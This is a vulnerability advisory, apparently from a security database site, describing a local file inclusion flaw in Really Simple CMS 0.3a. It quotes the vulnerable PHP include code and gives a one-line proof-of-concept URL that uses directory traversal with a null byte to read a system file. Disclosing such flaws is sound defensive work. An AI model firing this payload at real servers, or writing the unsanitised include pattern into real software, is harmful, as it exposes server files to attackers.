Really Simple CMS 0.3a (pagecontent.php PT) LFI Vulnerability

2009-08-18 / 2009-08-19
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion Vulnerability [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org [+] Download : http://sourceforge.net/projects/rscms/ [+] Local File Inclusion - Vulnerable code in plugings/pagecontent.php ----------------------------------- if (!$PT) { $PT = 'text'; } $PTF = "plugings/"; $PTF .= $PT; $PTF .= ".php"; require_once($PTF); ----------------------------------- - PoC http://127.0.0.1/[path]/plugings/pagecontent.php?PT=../../../../../../../boot.ini%00

References:

http://xforce.iss.net/xforce/xfdb/52159
http://www.milw0rm.com/exploits/9313


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top